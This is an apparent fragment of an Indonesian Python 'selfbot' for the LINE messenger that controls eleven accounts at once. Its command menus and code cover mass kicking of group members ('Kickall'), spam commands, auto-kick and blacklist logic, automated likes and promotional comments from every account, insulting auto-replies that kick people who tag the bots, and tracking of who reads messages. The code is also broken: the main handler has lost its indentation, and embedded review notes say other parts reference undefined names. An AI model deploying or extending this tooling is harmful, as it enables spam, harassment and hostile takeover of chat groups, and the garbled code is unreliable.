╠💻『Google (Text)』
╠💻『Playstore NamaApp』
╠💻『Fancytext Text』
╠💻『musik Judul-Penyanyi』
╠💻『lirik Judul-Penyanyi』
╠💻『musrik Judul-Penyanyi』
╠💻『ig UrsnameInstagram』
╠💻『Checkig UrsnameIG』
╠💻『apakah Text 』
╠💻『kapan Text 』
╠💻『hari Text 』
╠💻『berapa Text 』
╠💻『berapakah Text』
╠💻『Youtube Judul Video』
╠💻『Youtubevideo Judul Video』
╠💻『Youtubesearch: Judul Video』
╠💻『Image NamaGambar』
╠💻『Say Text』
╠💻『Say-en Text』
╠💻『Say-jp Text』
╠💻『Tr-id Text En Ke ID』
╠💻『Tr-en Text ID Ke En』
╠💻『Tr-th Text ID Ke Th』
╠💻『Id@en Text ID Ke En』
╠💻『Id@th Text ID Ke TH』
╠💻『En@id Text En Ke ID』
╠═══☆☞ G R O U P ☜☆═══════
╠🌀『Welcome』
╠🌀『Say welcome』
╠🌀『Invite creator』
╠🌀『Setview/Cctv』
╠🌀『Viewseen/Ciduk』
╠🌀『Gn: (NamaGroup)』
╠🌀『Tag all/Croot』
╠🌀『lurk on/off』
╠🌀『lurkers』
╠🌀『Recover』
╠🌀『Cancel』
╠🌀『Cancelall』
╠🌀『Gcreator』
╠🌀『Ginfo』
╠🌀『Gurl』
╠🌀『List group』
╠🌀『Pict group: NamaGroup』
╠🌀『Spam-5: Text』
╠🌀『Nspam: Text』
╠🌀『GhostSpam: Text』
╠🌀『Add all』
╠🌀『Kick: Mid』
╠🌀『Invite: Mid』
╠🌀『Bot:inv』
╠🌀『Memlist』
╠🌀『Getgroup image』
╠🌀『Urlgroup Image』
╠═══☆☞S E T ☜☆══════════
╠🔏『Notif on/off』
╠🔏『Protect on/off』
╠🔏『Invitepro on/off』
╠🔏『Alwaysread on/off』
╠🔏『Sider on/off』
╠🔏『Auto like』
╠🔏『Invitepro on/off』
╠🔏『Auto add on/off』
╠🔏『Auto leave on/off』
╠🔏『Auto join on/off』
╠🔏『Join cancel on/off』
╠🔏『Auto kick on/off』
╠🔏『Kicker on/off』
╠🔏『Comment on/off』
╠🔏『Share on/off』
╠🔏『Contact on/off』
╠🔏『Sticker on』
╠🔏『Qrprotect on/off』
╠═══☆☞C R E A T O R ☜☆═════
╠🎬『Blank』
╠🎬『Kickall/1997』
╠🎬『Bc: Text』
╠🎬『Join group: (NamaGroup』
╠🎬『Leave group: (NamaGroup』
╠🎬『Leave all group』
╠🎬『Tag on/off』
╠🎬『Bot restart/Reboot』
╠🎬『Turn off』
╠══════════════════════
║♻ Creating by:®R̸y̸a̸̸n̸ R̸̸a̸s̸̸y̸i̸̸d̸ ♻
║®Support by :
║☆☞ Silent Kill™『SK』
║☆☞ Ninja Jawa Killer™『NJK』
╚══════════════════════"""
ryanMessage ="""╔══════════════════════
║ ™☆☞R̸y̸a̸n̸ R̸a̸s̸yi̸d̸☜☆™
╠══════════════════════
╠🔒『Allprotect on/off』
╠🔒『Ban』
╠🔒『Unban』
╠🔒『Ban @』
╠🔒『Unban @』
╠🔒『Ban list』
╠🔒『Invite』
╠🔒『Clear ban』
╠🔒『Kill』
╠🔒『Kick @』
╠🔒『Set member: Jumlah』
╠🔒『Ban group: NamaGroup』
╠🔒『Del ban: NamaGroup』
╠🔒『List ban』
╠🔒『Kill ban』
╠🔒『Com set: text』
╠🔒『Pesan add- text』
╠🔒『Message set: text』
╠🔒『Message set text』
╠🔒『Help set: text』
╠🔒『Glist』
╠🔒『Glistmid』
╠🔒『Details group: Gid』
╠🔒『Cancel invite: Gid』
╠🔒『InviteMeTo: Gid』
╠🔒『Acc invite』
╠🔒『Removechat』
╠🔒『Qr on/off』
╠🔒『Autokick on/off』
╠🔒『Autocancel on/off』
╠🔒『Invitepro on/off』
╠🔒『Join on/off』
╠🔒『Joincancel on/off』
╠🔒『Respon1 on/off』
╠🔒『Respon2 on/off』
╠🔒『Respon3 on/off』
╠🔒『Respon4 on/off』
╠🔒『Responkick on/off』
╠══════════════════════
║♻ Creating by:®R̸y̸a̸̸n̸ R̸̸a̸s̸̸y̸i̸̸d̸ ♻
║®Support by :
║☆☞ Silent Kill™『SK』
║☆☞ Ninja Jawa Killer™『NJK』
╚══════════════════════"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
ki6mid = ki6.getProfile().mid
ki7mid = ki7.getProfile().mid
ki8mid = ki8.getProfile().mid
ki9mid = ki9.getProfile().mid
ki10mid = ki10.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid,ki6mid,ki7mid,ki8mid,ki9mid,ki10mid]
admsa = 'uf9769adcf23329d9caedcd850f6caea8'
admin = 'uf9769adcf23329d9caedcd850f6caea8'
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":10},
'leaveRoom':True,
'timeline':True,
'pap':{},
'likeOn':{},
'invite':{},
'winvite':{},
'copy':{},
'sticker':False,
'detectMention':False,
'detectMention2':False,
'detectMention3':False,
'detectMention4':True,
'kickMention':False,
'autoAdd':True,
'message':"Thanks For Add Me\n┅͜͡૨γαղ┅͜͡\n\n♻Support By ~ ҳ̸Ҳ̸ҳ Сўв∝я тҝ ҳ̸Ҳ̸ҳ\n\n✯==== Creator ====✯\n\nhttp://line.me/ti/p/~s.k.9.7",
"lang":"JP",
"Timeline":True,
"comment":"☆Auto Like ©By : R̶y̶an Pr̶o̶tect\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment1":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ1\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment2":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ2\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment3":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ3\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment4":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ4\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment5":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ5\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment6":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ6\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment7":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ7\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment8":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ8\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment9":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ9\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment10":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ10\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"commentOn":True,
"commentBlack":{},
"Sambutan":False,
"wblack":False,
"dblack":False,
"joinkick":{},
"AutoJoinCancel":True,
"AutoKick":{},
"Members":{},
"AutoKickon":False,
"clock":False,
"cNames":"",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"alwaysRead":False,
"Mimic":{},
"Sider":{},
"Simi":{},
"linkprotect":False,
}
settings = {
"simiSimi":{}
}
mode='self'
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup1 = ki.getProfile()
backup1.displayName = contact.displayName
backup1.statusMessage = contact.statusMessage
backup1.pictureStatus = contact.pictureStatus
contact = ki2.getProfile()
backup2 = ki2.getProfile()
backup2.displayName = contact.displayName
backup2.statusMessage = contact.statusMessage
backup2.pictureStatus = contact.pictureStatus
contact = ki3.getProfile()
backup3 = ki3.getProfile()
backup3.displayName = contact.displayName
backup3.statusMessage = contact.statusMessage
backup3.pictureStatus = contact.pictureStatus
contact = ki4.getProfile()
backup4 = ki4.getProfile()
backup4.displayName = contact.displayName
backup4.statusMessage = contact.statusMessage
backup4.pictureStatus = contact.pictureStatus
contact = ki5.getProfile()
backup5 = ki5.getProfile()
backup5.displayName = contact.displayName
backup5.statusMessage = contact.statusMessage
backup5.pictureStatus = contact.pictureStatus
contact = ki6.getProfile()
backup6 = ki6.getProfile()
backup6.displayName = contact.displayName
backup6.statusMessage = contact.statusMessage
backup6.pictureStatus = contact.pictureStatus
contact = ki7.getProfile()
backup7 = ki7.getProfile()
backup7.displayName = contact.displayName
backup7.statusMessage = contact.statusMessage
backup7.pictureStatus = contact.pictureStatus
contact = ki8.getProfile()
backup8 = ki8.getProfile()
backup8.displayName = contact.displayName
backup8.statusMessage = contact.statusMessage
backup8.pictureStatus = contact.pictureStatus
contact = ki9.getProfile()
backup9 = ki9.getProfile()
backup9.displayName = contact.displayName
backup9.statusMessage = contact.statusMessage
backup9.pictureStatus = contact.pictureStatus
contact = ki10.getProfile()
backup10 = ki10.getProfile()
backup10.displayName = contact.displayName
backup10.statusMessage = contact.statusMessage
backup10.pictureStatus = contact.pictureStatus
def waktu(secs):
    """Format a duration given in seconds as 'HH Jam MM Menit SS Detik'."""
    hours, remainder = divmod(secs, 3600)
    minutes, seconds = divmod(remainder, 60)
    return '%02d Jam %02d Menit %02d Detik' % (hours, minutes, seconds)
def cms(string, commands):
    """
    Return True when ``string`` exactly matches one of ``commands``.

    NOTE(review): the original iterated a list of command prefixes
    (+, @, /, >, ;, ^, %, $, ...) but never used the prefix in the
    comparison, so it merely repeated the same exact-match test 13 times.
    That dead prefix loop has been removed; observable behaviour (exact
    match only) is preserved.
    """
    for command in commands:
        if string == command:
            return True
    return False
# NOTE(review): this entire top-level section references ``op`` and
# ``summon``, neither of which is defined at module scope (and
# wait["memberscancel"] is never initialised), so it would raise NameError at
# import time. It appears to be event-handler code pasted outside of bot(op)
# — confirm intent and move it inside the handler.

# Op type 55: "notified read message" — record readers for the sider feature.
if op.type == 55:
    try:
        if op.param1 in wait2['readPoint']:
            if op.param2 in wait2['readMember'][op.param1]:
                pass
            else:
                # NOTE(review): string concatenation of member ids — the
                # membership test above is a substring check, not a set check.
                wait2['readMember'][op.param1] += op.param2
                wait2['ROM'][op.param1][op.param2] = op.param2
                with open('sider.json', 'w') as fp:
                    json.dump(wait2, fp, sort_keys=True, indent=4)
        else:
            pass
    except:
        pass
# Second op-55 handler: greet lurkers ("sider") when CCTV mode is active.
if op.type == 55:
    try:
        if cctv['cyduk'][op.param1]==True:
            if op.param1 in cctv['point']:
                Name = cl.getContact(op.param2).displayName
                # NOTE(review): Name is immediately overwritten by summon();
                # the getContact call above is dead.
                Name = summon(op.param2)
                if Name in cctv['sidermem'][op.param1]:
                    pass
                else:
                    cctv['sidermem'][op.param1] += "\n• " + Name
                if " " in Name:
                    nick = Name.split(' ')
                    # Both branches below send essentially the same greeting;
                    # only the message text differs by name length.
                    if len(nick) == 2:
                        cl.sendText(op.param1, "Haii " + "☞ " + Name + " ☜" + "\nNgintip Aja Niih. . .\nChat Kek Idiih (-__-) ")
                        time.sleep(0.2)
                        summon(op.param1,[op.param2])
                    else:
                        cl.sendText(op.param1, "Haii " + "☞ " + Name + " ☜" + "\nBetah Banget Jadi Penonton. . .\nChat Napa (-__-) ")
                        time.sleep(0.2)
                        summon(op.param1,[op.param2])
                else:
                    cl.sendText(op.param1, "Haii " + "☞ " + Name + " ☜" + "\nNgapain Kak Ngintip Aja???\nSini Gabung Chat... ")
                    time.sleep(0.2)
                    summon(op.param1,[op.param2])
            else:
                pass
        else:
            pass
    except:
        pass
else:
    pass
# Group-invitation auto-accept: leave again if the group is too small.
if mid in op.param3:
    if wait["AutoJoinCancel"] == True:
        G = cl.getGroup(op.param1)
        if len(G.members) <= wait["memberscancel"]:
            cl.acceptGroupInvitation(op.param1)
            cl.sendText(op.param1,"Maaf " + cl.getContact(op.param2).displayName + "\nMember Kurang Dari 30 Orang\nUntuk Info, Silahkan Chat Owner Kami!")
            cl.leaveGroup(op.param1)
        else:
            cl.acceptGroupInvitation(op.param1)
            cl.sendText(op.param1,"☆『Assalamu'alaikum』☆\n☆『Newbie Om, Jangan Dibully』☆")
def restart_program():
    """Replace the current process with a fresh interpreter running this script."""
    os.execl(sys.executable, sys.executable, *sys.argv)
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
ki.rejectGroupInvitation(op.param1)
ki2.rejectGroupInvitation(op.param1)
ki3.rejectGroupInvitation(op.param1)
ki4.rejectGroupInvitation(op.param1)
ki4.rejectGroupInvitation(op.param1)
ki6.rejectGroupInvitation(op.param1)
ki7.rejectGroupInvitation(op.param1)
ki8.rejectGroupInvitation(op.param1)
ki9.rejectGroupInvitation(op.param1)
ki10.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
ki2.acceptGroupInvitation(op.param1)
ki3.acceptGroupInvitation(op.param1)
ki4.acceptGroupInvitation(op.param1)
ki5.acceptGroupInvitation(op.param1)
ki6.acceptGroupInvitation(op.param1)
ki7.acceptGroupInvitation(op.param1)
ki8.acceptGroupInvitation(op.param1)
ki9.acceptGroupInvitation(op.param1)
ki10.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
ki2.acceptGroupInvitation(op.param1)
ki3.acceptGroupInvitation(op.param1)
ki4.acceptGroupInvitation(op.param1)
ki5.acceptGroupInvitation(op.param1)
ki6.acceptGroupInvitation(op.param1)
ki7.acceptGroupInvitation(op.param1)
ki8.acceptGroupInvitation(op.param1)
ki9.acceptGroupInvitation(op.param1)
ki10.acceptGroupInvitation(op.param1)
if msg.contentType == 16:
if wait['likeOn'] == True:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1005)
ki.like(url[25:58], url[66:], likeType=1002)
ki2.like(url[25:58], url[66:], likeType=1004)
ki3.like(url[25:58], url[66:], likeType=1003)
ki4.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment"])
ki.comment(url[25:58], url[66:], wait["comment"])
ki2.comment(url[25:58], url[66:], wait["comment"])
ki3.comment(url[25:58], url[66:], wait["comment"])
ki4.comment(url[25:58], url[66:], wait["comment"])
cl.sendText(msg.to,"Like Success")
wait['likeOn'] = True
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "uf9769adcf23329d9caedcd850f6caea8":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if wait["AutoKick"] == True:
try:
if op.param3 in admsa:
if op.param3 in admin:
if op.param3 in Bots:
pass
if op.param2 in admsa:
if op.param2 in admin:
if op.param2 in Bots:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
ki2.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in admsa:
if op.param2 not in admin:
if op.param2 not in Bots:
ki3.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
ki4.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admsa:
if op.param2 in admin:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admsa:
if op.param2 in admin:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
if mid in op.param3:
if op.param2 in admsa:
if op.param2 in Bots:
pass
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
ki6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki7.kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if admsa in op.param3:
if admin in op.param3:
if op.param2 in Bots:
pass
try:
ki8.kickoutFromGroup(op.param1,[op.param2])
ki9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param2 not in Bots:
ki10.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
ki.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
ki2.inviteIntoGroup(op.param1,[op.param3])
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1002)
ki2.like(url[25:58], url[66:], likeType=1004)
ki3.like(url[25:58], url[66:], likeType=1003)
ki4.like(url[25:58], url[66:], likeType=1001)
ki5.like(url[25:58], url[66:], likeType=1002)
ki6.like(url[25:58], url[66:], likeType=1004)
ki7.like(url[25:58], url[66:], likeType=1003)
ki8.like(url[25:58], url[66:], likeType=1001)
ki9.like(url[25:58], url[66:], likeType=1002)
ki10.like(url[25:58], url[66:], likeType=1004)
cl.comment(url[25:58], url[66:], wait["comment"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment2"])
ki3.comment(url[25:58], url[66:], wait["comment3"])
ki4.comment(url[25:58], url[66:], wait["comment4"])
ki5.comment(url[25:58], url[66:], wait["comment5"])
ki6.comment(url[25:58], url[66:], wait["comment6"])
ki7.comment(url[25:58], url[66:], wait["comment7"])
ki8.comment(url[25:58], url[66:], wait["comment8"])
ki9.comment(url[25:58], url[66:], wait["comment9"])
ki10.comment(url[25:58], url[66:], wait["comment10"])
cl.sendText(msg.to,"Like Success")
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki3.sendText(msg.to,text)
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
ki2.sendText(msg.to,data['result']['response'].encode('utf-8'))
# Anti-tag kick: when kickMention is armed, anyone who @-mentions one of the
# bot accounts gets a taunt and is kicked from the group by ki2.
# NOTE: the original test was `'MENTION' in msg.contentMetadata.keys() != None`,
# an accidental chained comparison ((in keys()) and (keys() != None)); the
# second half is always true, so plain membership is equivalent and clearer.
if 'MENTION' in msg.contentMetadata:
    if wait["kickMention"] == True:
        contact = cl.getContact(msg.from_)
        cName = contact.displayName
        balas = ["Ngetag Lagi Yawloh " + cName + "\n! Sorry, Byee!!!"]
        ret_ = random.choice(balas)
        name = re.findall(r'@(\w+)', msg.text)
        mention = ast.literal_eval(msg.contentMetadata['MENTION'])
        mentionees = mention['MENTIONEES']
        for mention in mentionees:
            if mention['M'] in Bots:
                cl.sendText(msg.to,ret_)
                ki2.kickoutFromGroup(msg.to,[msg.from_])
                break
# Auto-respond #1: when a bot account is @-mentioned, ki replies with a random
# taunt, a text-to-speech MP3 (gTTS, Indonesian), and a sticker.
# Simplified the accidental chained comparison `in ... .keys() != None`
# to a plain membership test (behaviorally identical).
if 'MENTION' in msg.contentMetadata:
    if wait["detectMention"] == True:
        contact = ki.getContact(msg.from_)
        cName = contact.displayName
        balas = ["Gosah TAG-TAG " + cName + " JEMBOTT!!!","Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja " + cName ,"Woii " + cName + " Jangan Ngetag, Riibut!","Yawloh,, Jones Karatan " + cName + " NgeTag!!","Ono Opo MBOTT" + cName + " NgeTag-Tag!!"]
        ret_ = random.choice(balas)
        name = re.findall(r'@(\w+)', msg.text)
        mention = ast.literal_eval(msg.contentMetadata['MENTION'])
        mentionees = mention['MENTIONEES']
        for mention in mentionees:
            if mention['M'] in Bots:
                ki.sendText(msg.to,ret_)
                rnd = ["Buset si joness ngetag mulu, kalo penting langsung pe em riyan nya aja","Ni orang kerjaan nya ngetag mulu, gift tikel aja enggak pernah, suwe lu jamban"]
                p = random.choice(rnd)
                lang = 'id'
                tts = gTTS(text=p, lang=lang)
                tts.save("hasil.mp3")
                ki.sendAudio(msg.to,"hasil.mp3")
                # Reuse the incoming msg object as an outgoing sticker message.
                msg.contentType = 7
                msg.text = None
                msg.contentMetadata = {
                    "STKID": "145",
                    "STKPKGID": "2",
                    "STKVER": "100" }
                ki.sendMessage(msg)
                break
# Auto-respond #2: when a bot account is @-mentioned, cl replies with a random
# taunt plus a sticker.  Membership test simplified from the accidental
# chained comparison `in ... .keys() != None` (behaviorally identical).
if 'MENTION' in msg.contentMetadata:
    if wait["detectMention2"] == True:
        contact = cl.getContact(msg.from_)
        cName = contact.displayName
        balas = ["Gosah TAG-TAG " + cName + " JEMBOTT!!!","Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja " + cName ,"Woii " + cName + " Jangan Ngetag, Riibut!","Yawloh,, Jones Karatan " + cName + " NgeTag!!","Ono Opo MBOTT" + cName + " NgeTag-Tag!!"]
        ret_ = random.choice(balas)
        name = re.findall(r'@(\w+)', msg.text)
        mention = ast.literal_eval(msg.contentMetadata['MENTION'])
        mentionees = mention['MENTIONEES']
        for mention in mentionees:
            if mention['M'] in Bots:
                cl.sendText(msg.to,ret_)
                msg.contentType = 7
                msg.text = None
                msg.contentMetadata = {
                    "STKID": "2754644",
                    "STKPKGID": "1066653",
                    "STKVER": "1" }
                cl.sendMessage(msg)
                break
# Auto-respond #3: when a bot account is @-mentioned, cl replies with a text,
# the tagger's own profile picture ("selfie"), and a sticker.
# Membership test simplified from the accidental chained comparison
# `in ... .keys() != None` (behaviorally identical).
if 'MENTION' in msg.contentMetadata:
    if wait["detectMention3"] == True:
        contact = cl.getContact(msg.from_)
        cName = contact.displayName
        balas = ["" + cName + ", Jadilah Jones Alami Yang Nggak Suka NgeTag Orang Ganteng"]
        balas1 = "Selfie dulu ya Cet. . ."
        ret_ = random.choice(balas)
        image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
        name = re.findall(r'@(\w+)', msg.text)
        mention = ast.literal_eval(msg.contentMetadata['MENTION'])
        mentionees = mention['MENTIONEES']
        for mention in mentionees:
            if mention['M'] in Bots:
                cl.sendText(msg.to,ret_)
                cl.sendText(msg.to,balas1)
                cl.sendImageWithURL(msg.to,image)
                msg.contentType = 7
                msg.text = None
                msg.contentMetadata = {
                    "STKID": "20470229",
                    "STKPKGID": "1604391",
                    "STKVER": "1" }
                cl.sendMessage(msg)
                break
# Auto-respond #4: like #1 but driven by cl instead of ki (taunt + gTTS audio
# + sticker).  Membership test simplified from the accidental chained
# comparison `in ... .keys() != None` (behaviorally identical).
if 'MENTION' in msg.contentMetadata:
    if wait["detectMention4"] == True:
        contact = cl.getContact(msg.from_)
        cName = contact.displayName
        balas = ["Gosah TAG-TAG " + cName + " JEMBOTT!!!","Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja " + cName ,"Woii " + cName + " Jangan Ngetag, Riibut!","Yawloh,, Jones Karatan " + cName + " NgeTag!!","Ono Opo MBOTT " + cName + " NgeTag-Tag!!"]
        ret_ = random.choice(balas)
        name = re.findall(r'@(\w+)', msg.text)
        mention = ast.literal_eval(msg.contentMetadata['MENTION'])
        mentionees = mention['MENTIONEES']
        for mention in mentionees:
            if mention['M'] in Bots:
                cl.sendText(msg.to,ret_)
                rnd = ["Buset si joness ngetag mulu, kalo penting langsung pe em riyan nya aja","Ni orang kerjaan nya ngetag mulu, gift tikel aja enggak pernah, suwe lu jamban"]
                p = random.choice(rnd)
                lang = 'id'
                tts = gTTS(text=p, lang=lang)
                tts.save("hasil.mp3")
                cl.sendAudio(msg.to,"hasil.mp3")
                msg.contentType = 7
                msg.text = None
                msg.contentMetadata = {
                    "STKID": "15913016",
                    "STKPKGID": "1413652",
                    "STKVER": "1" }
                cl.sendMessage(msg)
                break
# op.type 25 (self-sent message): a shared contact card (contentType 13) while
# "winvite" is armed makes assist bot ki invite that contact into the group.
# Blacklisted mids are refused; a member whose display name already contains
# the shared name is reported as present.
if op.type == 25:
    msg = op.message
    if msg.contentType == 13:
        if wait["winvite"] == True:
            if msg.from_ in admin:
                _name = msg.contentMetadata["displayName"]
                invite = msg.contentMetadata["mid"]
                groups = cl.getGroup(msg.to)
                pending = groups.invitee
                targets = []
                for s in groups.members:
                    if _name in s.displayName:
                        ki.sendText(msg.to,"-> " + _name + " was here")
                        break
                    elif invite in wait["blacklist"]:
                        ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
                        ki2.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
                        break
                    else:
                        # NOTE(review): appends the same mid once per
                        # non-matching member, so `targets` may hold duplicates.
                        targets.append(invite)
                if targets == []:
                    pass
                else:
                    for target in targets:
                        try:
                            ki.findAndAddContactsByMid(target)
                            ki.inviteIntoGroup(msg.to,[target])
                            ki2.sendText(msg.to,"Done Invite : \n➡" + _name)
                            #wait["winvite"] = False
                            break
                        except:
                            # Fallback: retry the invite against op.param1.
                            try:
                                ki.findAndAddContactsByMid(invite)
                                ki.inviteIntoGroup(op.param1,[invite])
                                #wait["winvite"] = False
                            except:
                                ki.sendText(msg.to,"Negative, Error detected")
                                #wait["winvite"] = False
                            break
# Same contact-card invite flow as "winvite" above, but driven by the main
# client cl and gated on the "invite" flag; this variant disarms the flag
# after a successful (or failed) invite.
if op.type == 25:
    msg = op.message
    if msg.contentType == 13:
        if wait["invite"] == True:
            if msg.from_ in admin:
                _name = msg.contentMetadata["displayName"]
                invite = msg.contentMetadata["mid"]
                groups = cl.getGroup(msg.to)
                pending = groups.invitee
                targets = []
                for s in groups.members:
                    if _name in s.displayName:
                        cl.sendText(msg.to,"-> " + _name + " was here")
                        break
                    elif invite in wait["blacklist"]:
                        cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
                        cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
                        break
                    else:
                        targets.append(invite)
                if targets == []:
                    pass
                else:
                    for target in targets:
                        try:
